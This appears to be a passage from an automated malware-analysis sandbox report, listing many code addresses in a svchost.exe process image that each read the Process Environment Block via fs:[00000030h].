          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A64588 mov eax, dword ptr fs:[00000030h]1_2_03A64588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E59C mov eax, dword ptr fs:[00000030h]1_2_03A6E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03A5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03A5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03A5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03A5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03A5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03A5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03A5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03A5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A325E0 mov eax, dword ptr fs:[00000030h]1_2_03A325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C5ED mov eax, dword ptr fs:[00000030h]1_2_03A6C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C5ED mov eax, dword ptr fs:[00000030h]1_2_03A6C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E5CF mov eax, dword ptr fs:[00000030h]1_2_03A6E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E5CF mov eax, dword ptr fs:[00000030h]1_2_03A6E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A365D0 mov eax, dword ptr fs:[00000030h]1_2_03A365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03A6A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03A6A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]1_2_03A40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]1_2_03A40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]1_2_03A40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]1_2_03A40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]1_2_03A40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]1_2_03A40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]1_2_03A5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]1_2_03A5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]1_2_03A5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]1_2_03A5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]1_2_03A5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC6500 mov eax, dword ptr fs:[00000030h]1_2_03AC6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]1_2_03B04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]1_2_03B04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]1_2_03B04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]1_2_03B04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]1_2_03B04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]1_2_03B04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]1_2_03B04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6656A mov eax, dword ptr fs:[00000030h]1_2_03A6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6656A mov eax, dword ptr fs:[00000030h]1_2_03A6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6656A mov eax, dword ptr fs:[00000030h]1_2_03A6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38550 mov eax, dword ptr fs:[00000030h]1_2_03A38550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38550 mov eax, dword ptr fs:[00000030h]1_2_03A38550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A364AB mov eax, dword ptr fs:[00000030h]1_2_03A364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A644B0 mov ecx, dword ptr fs:[00000030h]1_2_03A644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]1_2_03ABA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEA49A mov eax, dword ptr fs:[00000030h]1_2_03AEA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A304E5 mov ecx, dword ptr fs:[00000030h]1_2_03A304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2E420 mov eax, dword ptr fs:[00000030h]1_2_03A2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2E420 mov eax, dword ptr fs:[00000030h]1_2_03A2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2E420 mov eax, dword ptr fs:[00000030h]1_2_03A2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C427 mov eax, dword ptr fs:[00000030h]1_2_03A2C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]1_2_03AB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]1_2_03AB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]1_2_03AB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]1_2_03AB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]1_2_03AB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]1_2_03AB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]1_2_03AB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A68402 mov eax, dword ptr fs:[00000030h]1_2_03A68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A68402 mov eax, dword ptr fs:[00000030h]1_2_03A68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A68402 mov eax, dword ptr fs:[00000030h]1_2_03A68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABC460 mov ecx, dword ptr fs:[00000030h]1_2_03ABC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5A470 mov eax, dword ptr fs:[00000030h]1_2_03A5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5A470 mov eax, dword ptr fs:[00000030h]1_2_03A5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5A470 mov eax, dword ptr fs:[00000030h]1_2_03A5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]1_2_03A6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]1_2_03A6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]1_2_03A6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]1_2_03A6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]1_2_03A6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]1_2_03A6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]1_2_03A6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]1_2_03A6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEA456 mov eax, dword ptr fs:[00000030h]1_2_03AEA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2645D mov eax, dword ptr fs:[00000030h]1_2_03A2645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5245A mov eax, dword ptr fs:[00000030h]1_2_03A5245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40BBE mov eax, dword ptr fs:[00000030h]1_2_03A40BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40BBE mov eax, dword ptr fs:[00000030h]1_2_03A40BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03AE4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03AE4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38BF0 mov eax, dword ptr fs:[00000030h]1_2_03A38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38BF0 mov eax, dword ptr fs:[00000030h]1_2_03A38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38BF0 mov eax, dword ptr fs:[00000030h]1_2_03A38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5EBFC mov eax, dword ptr fs:[00000030h]1_2_03A5EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]1_2_03ABCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A50BCB mov eax, dword ptr fs:[00000030h]1_2_03A50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A50BCB mov eax, dword ptr fs:[00000030h]1_2_03A50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A50BCB mov eax, dword ptr fs:[00000030h]1_2_03A50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30BCD mov eax, dword ptr fs:[00000030h]1_2_03A30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30BCD mov eax, dword ptr fs:[00000030h]1_2_03A30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30BCD mov eax, dword ptr fs:[00000030h]1_2_03A30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]1_2_03ADEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5EB20 mov eax, dword ptr fs:[00000030h]1_2_03A5EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5EB20 mov eax, dword ptr fs:[00000030h]1_2_03A5EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF8B28 mov eax, dword ptr fs:[00000030h]1_2_03AF8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF8B28 mov eax, dword ptr fs:[00000030h]1_2_03AF8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04B00 mov eax, dword ptr fs:[00000030h]1_2_03B04B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]1_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2CB7E mov eax, dword ptr fs:[00000030h]1_2_03A2CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE4B4B mov eax, dword ptr fs:[00000030h]1_2_03AE4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE4B4B mov eax, dword ptr fs:[00000030h]1_2_03AE4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B02B57 mov eax, dword ptr fs:[00000030h]1_2_03B02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B02B57 mov eax, dword ptr fs:[00000030h]1_2_03B02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B02B57 mov eax, dword ptr fs:[00000030h]1_2_03B02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B02B57 mov eax, dword ptr fs:[00000030h]1_2_03B02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC6B40 mov eax, dword ptr fs:[00000030h]1_2_03AC6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC6B40 mov eax, dword ptr fs:[00000030h]1_2_03AC6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFAB40 mov eax, dword ptr fs:[00000030h]1_2_03AFAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD8B42 mov eax, dword ptr fs:[00000030h]1_2_03AD8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A28B50 mov eax, dword ptr fs:[00000030h]1_2_03A28B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADEB50 mov eax, dword ptr fs:[00000030h]1_2_03ADEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38AA0 mov eax, dword ptr fs:[00000030h]1_2_03A38AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38AA0 mov eax, dword ptr fs:[00000030h]1_2_03A38AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A86AA4 mov eax, dword ptr fs:[00000030h]1_2_03A86AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]1_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04A80 mov eax, dword ptr fs:[00000030h]1_2_03B04A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A68A90 mov edx, dword ptr fs:[00000030h]1_2_03A68A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6AAEE mov eax, dword ptr fs:[00000030h]1_2_03A6AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6AAEE mov eax, dword ptr fs:[00000030h]1_2_03A6AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A86ACC mov eax, dword ptr fs:[00000030h]1_2_03A86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A86ACC mov eax, dword ptr fs:[00000030h]1_2_03A86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A86ACC mov eax, dword ptr fs:[00000030h]1_2_03A86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30AD0 mov eax, dword ptr fs:[00000030h]1_2_03A30AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A64AD0 mov eax, dword ptr fs:[00000030h]1_2_03A64AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A64AD0 mov eax, dword ptr fs:[00000030h]1_2_03A64AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6CA24 mov eax, dword ptr fs:[00000030h]1_2_03A6CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5EA2E mov eax, dword ptr fs:[00000030h]1_2_03A5EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A54A35 mov eax, dword ptr fs:[00000030h]1_2_03A54A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A54A35 mov eax, dword ptr fs:[00000030h]1_2_03A54A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABCA11 mov eax, dword ptr fs:[00000030h]1_2_03ABCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6CA6F mov eax, dword ptr fs:[00000030h]1_2_03A6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6CA6F mov eax, dword ptr fs:[00000030h]1_2_03A6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6CA6F mov eax, dword ptr fs:[00000030h]1_2_03A6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADEA60 mov eax, dword ptr fs:[00000030h]1_2_03ADEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AACA72 mov eax, dword ptr fs:[00000030h]1_2_03AACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AACA72 mov eax, dword ptr fs:[00000030h]1_2_03AACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]1_2_03A36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]1_2_03A36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]1_2_03A36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]1_2_03A36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]1_2_03A36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]1_2_03A36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]1_2_03A36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40A5B mov eax, dword ptr fs:[00000030h]1_2_03A40A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40A5B mov eax, dword ptr fs:[00000030h]1_2_03A40A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]1_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A309AD mov eax, dword ptr fs:[00000030h]1_2_03A309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A309AD mov eax, dword ptr fs:[00000030h]1_2_03A309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB89B3 mov esi, dword ptr fs:[00000030h]1_2_03AB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB89B3 mov eax, dword ptr fs:[00000030h]1_2_03AB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB89B3 mov eax, dword ptr fs:[00000030h]1_2_03AB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]1_2_03ABE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A629F9 mov eax, dword ptr fs:[00000030h]1_2_03A629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A629F9 mov eax, dword ptr fs:[00000030h]1_2_03A629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC69C0 mov eax, dword ptr fs:[00000030h]1_2_03AC69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03A3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03A3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03A3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03A3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03A3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03A3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A649D0 mov eax, dword ptr fs:[00000030h]1_2_03A649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]1_2_03AFA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB892A mov eax, dword ptr fs:[00000030h]1_2_03AB892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC892B mov eax, dword ptr fs:[00000030h]1_2_03AC892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE908 mov eax, dword ptr fs:[00000030h]1_2_03AAE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE908 mov eax, dword ptr fs:[00000030h]1_2_03AAE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABC912 mov eax, dword ptr fs:[00000030h]1_2_03ABC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A28918 mov eax, dword ptr fs:[00000030h]1_2_03A28918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A28918 mov eax, dword ptr fs:[00000030h]1_2_03A28918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A56962 mov eax, dword ptr fs:[00000030h]1_2_03A56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A56962 mov eax, dword ptr fs:[00000030h]1_2_03A56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A56962 mov eax, dword ptr fs:[00000030h]1_2_03A56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A7096E mov eax, dword ptr fs:[00000030h]1_2_03A7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A7096E mov edx, dword ptr fs:[00000030h]1_2_03A7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A7096E mov eax, dword ptr fs:[00000030h]1_2_03A7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD4978 mov eax, dword ptr fs:[00000030h]1_2_03AD4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD4978 mov eax, dword ptr fs:[00000030h]1_2_03AD4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABC97C mov eax, dword ptr fs:[00000030h]1_2_03ABC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB0946 mov eax, dword ptr fs:[00000030h]1_2_03AB0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04940 mov eax, dword ptr fs:[00000030h]1_2_03B04940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30887 mov eax, dword ptr fs:[00000030h]1_2_03A30887
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABC89D mov eax, dword ptr fs:[00000030h]1_2_03ABC89D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]1_2_03AFA8E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03A6C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03A6C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]1_2_03A5E8C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B008C0 mov eax, dword ptr fs:[00000030h]1_2_03B008C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]1_2_03A52835
